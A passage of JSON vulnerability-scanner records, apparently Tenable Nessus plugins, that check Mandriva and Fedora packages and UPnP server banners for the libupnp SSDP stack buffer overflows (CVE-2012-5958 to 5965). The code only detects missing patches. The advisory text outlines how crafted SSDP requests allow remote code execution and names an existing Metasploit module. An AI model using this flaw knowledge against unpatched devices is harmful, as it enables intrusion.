0;\nif (rpm_check(release:\"FC17\", reference:\"mediatomb-0.12.1-23.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediatomb\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:54:06", "description": "Updated libupnp packages fix security vulnerabilities :\n\nThe Portable SDK for UPnP Devices libupnp library contains multiple\nbuffer overflow vulnerabilities. 
Devices that use libupnp may also\naccept UPnP queries over the WAN interface, therefore exposing the\nvulnerabilities to the internet (CVE-2012-5958, CVE-2012-5959,\nCVE-2012-5960, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963,\nCVE-2012-5964, CVE-2012-5965).", "edition": 25, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : libupnp (MDVSA-2013:098)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:lib64ixml2", "p-cpe:/a:mandriva:linux:lib64threadutil6", "p-cpe:/a:mandriva:linux:lib64upnp6", "p-cpe:/a:mandriva:linux:lib64upnp-devel"], "id": "MANDRIVA_MDVSA-2013-098.NASL", "href": "https://www.tenable.com/plugins/nessus/66110", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:098. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66110);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_bugtraq_id(57602);\n script_xref(name:\"MDVSA\", value:\"2013:098\");\n script_xref(name:\"MGASA\", value:\"2013-0037\");\n\n script_name(english:\"Mandriva Linux Security Advisory : libupnp (MDVSA-2013:098)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated libupnp packages fix security vulnerabilities :\n\nThe Portable SDK for UPnP Devices libupnp library contains multiple\nbuffer overflow vulnerabilities. 
Devices that use libupnp may also\naccept UPnP queries over the WAN interface, therefore exposing the\nvulnerabilities to the internet (CVE-2012-5958, CVE-2012-5959,\nCVE-2012-5960, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963,\nCVE-2012-5964, CVE-2012-5965).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64ixml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64threadutil6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64upnp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64upnp6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64ixml2-1.6.15-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64threadutil6-1.6.15-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64upnp-devel-1.6.15-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64upnp6-1.6.15-2.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:08", "description": "linupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-02-13T00:00:00", "title": "Fedora 16 : libupnp-1.6.18-1.fc16 (2013-1713)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-13T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libupnp", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2013-1713.NASL", "href": "https://www.tenable.com/plugins/nessus/64597", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1713.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64597);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"FEDORA\", value:\"2013-1713\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 16 : libupnp-1.6.18-1.fc16 (2013-1713)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"linupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/098665.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1868e4ea\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libupnp package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libupnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"libupnp-1.6.18-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libupnp\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T15:43:14", "description": "According to its banner, the version of Portable SDK for UPnP Devices\n(libupnp) running on the remote host is prior to 1.6.18. It is,\ntherefore, affected by multiple remote code execution\nvulnerabilities :\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the DeviceType URN. 
An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted SSDP request, to execute arbitrary code.\n (CVE-2012-5958)\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the UDN prior to two colons. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted SSDP request, to execute arbitrary\n code. (CVE-2012-5959)\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the UDN prior to the '::upnp:rootdevice'\n string. An unauthenticated, remote attacker can exploit\n this, via a specially crafted SSDP request, to execute\n arbitrary code. (CVE-2012-5960)\n\n - Multiple stack-based buffer overflow conditions exist in\n the unique_service_name() function within file\n ssdp/ssdp_server.c due to improper validation of the\n UDN, DeviceType, and ServiceType fields when parsing\n Simple Service Discovery Protocol (SSDP) requests. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted SSDP request, to execute\n arbitrary code. 
(CVE-2012-5961, CVE-2012-5962,\n CVE-2012-5963, CVE-2012-5964, CVE-2012-5965)", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-02-01T00:00:00", "title": "Portable SDK for UPnP Devices (libupnp) < 1.6.18 Multiple Stack-based Buffer Overflows RCE", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-01T00:00:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp", "cpe:/a:libupnp_project:libupnp"], "id": "LIBUPNP_1_6_18.NASL", "href": "https://www.tenable.com/plugins/nessus/64394", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64394);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/02\");\n\n script_cve_id(\n \"CVE-2012-5958\",\n \"CVE-2012-5959\",\n \"CVE-2012-5960\",\n \"CVE-2012-5961\",\n \"CVE-2012-5962\",\n \"CVE-2012-5963\",\n \"CVE-2012-5964\",\n \"CVE-2012-5965\"\n );\n script_bugtraq_id(57602);\n script_xref(name:\"CERT\", value:\"922681\");\n script_xref(name:\"EDB-ID\", value:\"24455\");\n\n script_name(english:\"Portable SDK for UPnP Devices (libupnp) < 1.6.18 Multiple Stack-based Buffer Overflows RCE\");\n script_summary(english:\"Checks the libupnp banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network service running on the remote host is affected by multiple\nremote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Portable SDK for UPnP Devices\n(libupnp) running on the remote host is prior to 1.6.18. 
It is,\ntherefore, affected by multiple remote code execution\nvulnerabilities :\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the DeviceType URN. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted SSDP request, to execute arbitrary code.\n (CVE-2012-5958)\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the UDN prior to two colons. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted SSDP request, to execute arbitrary\n code. (CVE-2012-5959)\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the UDN prior to the '::upnp:rootdevice'\n string. An unauthenticated, remote attacker can exploit\n this, via a specially crafted SSDP request, to execute\n arbitrary code. (CVE-2012-5960)\n\n - Multiple stack-based buffer overflow conditions exist in\n the unique_service_name() function within file\n ssdp/ssdp_server.c due to improper validation of the\n UDN, DeviceType, and ServiceType fields when parsing\n Simple Service Discovery Protocol (SSDP) requests. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted SSDP request, to execute\n arbitrary code. 
(CVE-2012-5961, CVE-2012-5962,\n CVE-2012-5963, CVE-2012-5964, CVE-2012-5965)\");\n # https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?46d66d2f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.rapid7.com/?community\");\n # https://help.rapid7.com/?community\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d381943f\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8642ada6\");\n # https://cert-portal.siemens.com/productcert/pdf/ssa-963338.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a76191f3\");\n \n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to libupnp version 1.6.18 or later. If libupnp is used as a\nthird party library by a different application, contact the vendor of\nthat application for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-5958\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/29\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:libupnp_project:libupnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2020 Tenable Network Security, Inc.\");\n\n script_dependencies(\"upnp_search.nasl\", \"http_version.nasl\");\n script_require_ports(\"upnp/server\", \"Services/www\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nglobal_var fix, vuln;\nfix = '1.6.18';\nvuln = FALSE;\n\n##\n# Checks if the given server banner is from a vulnerable\n# version of libupnp. If so, a reporting function is\n# called\n#\n# @param port port number of the service being tested\n# @param server server banner advertised on \"port\"\n# @param proto the protocol the port is accessible by (tcp or udp)\n##\nfunction _check_libupnp_version(port, server, proto)\n{\n local_var ver, report, banner;\n server = chomp(server);\n ver = pregmatch(string:server, pattern:' (Intel|Portable|WindRiver) SDK for UPnP devices */([0-9.]+)', icase:TRUE);\n\n # the latter two checks are there to account for one-offs where there is no version listed\n # in the server banner, but these specific versions are listed as vulnerable in R7's report\n if (\n (!isnull(ver) && ver_compare(ver:ver[2], fix:fix, strict:FALSE) < 0) ||\n server == 'PACKAGE_VERSION WIND version 2.8, UPnP/1.0, WindRiver SDK for UPnP devices/' ||\n server == 'Linux/2.6.22.19-40-sigma, UPnP/1.0, Portable SDK for UPnP devices/'\n )\n {\n vuln = TRUE;\n\n banner = preg_replace(string:server, pattern:'SERVER: *(.+)', replace:\"\\1\", 
icase:TRUE);\n report = '\\n Server banner : ' + banner;\n report += '\\n Source: ' + toupper(proto);\n if (!isnull(ver[2])) report += '\\n Installed version : ' + ver[2];\n report += '\\n Fixed version : ' + fix + '\\n';\n\n security_report_v4(port:port,\n proto:proto,\n severity:SECURITY_HOLE,\n extra:report);\n }\n}\n\n# check the server string retrieved via UDP 1900 by upnp_search.nasl\nservers = get_kb_list('upnp/server');\nforeach (server in servers) _check_libupnp_version(port:1900, server:server, proto:'udp');\n\n# check any server strings retrieved via HTTP and there are any UPnP ports open\nwww_ports = get_kb_list('Services/www');\nif (!isnull(servers))\n{\n foreach port (www_ports)\n {\n server = http_server_header(port:port);\n if (isnull(server)) continue;\n\n _check_libupnp_version(port:port, server:server, proto:'tcp');\n }\n}\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:41", "description": "Unbundle libupnp.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "published": "2013-02-21T00:00:00", "title": "Fedora 18 : mediatomb-0.12.1-23.fc18 (2013-2377)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:mediatomb"], "id": "FEDORA_2013-2377.NASL", "href": "https://www.tenable.com/plugins/nessus/64736", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-2377.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64736);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_bugtraq_id(57602);\n script_xref(name:\"FEDORA\", value:\"2013-2377\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 18 : mediatomb-0.12.1-23.fc18 (2013-2377)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Unbundle libupnp.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/099022.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af59645a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediatomb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediatomb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"mediatomb-0.12.1-23.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediatomb\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:12", "description": "libupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-02-13T00:00:00", "title": "Fedora 18 : libupnp-1.6.18-1.fc18 (2013-1765)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-13T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:libupnp"], "id": "FEDORA_2013-1765.NASL", "href": "https://www.tenable.com/plugins/nessus/64601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1765.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64601);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"FEDORA\", value:\"2013-1765\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 18 : libupnp-1.6.18-1.fc18 (2013-1765)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
